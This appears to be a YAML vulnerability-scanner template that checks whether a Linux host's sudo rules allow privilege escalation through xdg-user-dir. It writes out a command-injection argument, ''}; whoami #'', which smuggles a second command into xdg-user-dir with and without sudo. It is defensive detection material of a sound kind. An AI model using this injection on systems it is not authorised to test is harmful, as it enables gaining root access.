id: privesc-xdg-user-dir

info:
  name: xdg-user-dir - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    The xdg-user-dir command is used to retrieve the path of a user's special directories, such as the user's home directory, desktop directory, download directory, and others, based on the XDG Base Directory Specification.
  reference:
    - https://gtfobins.github.io/gtfobins/xdg-user-dir/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,xdg-user-dir,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      xdg-user-dir '}; whoami #'

  - engine:
      - sh
      - bash
    source: |
      sudo xdg-user-dir '}; whoami #'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4b0a00483046022100d17c41271f0a8ca24a89b7a7877cab466210605ba9e718b2d2b9c17312554f55022100ea9f284afaa7b017890e9444a38232026b2ee2b8d9b7475e44b352b1c6dc9b8b:922c64590222798bb761d5b6d8e72950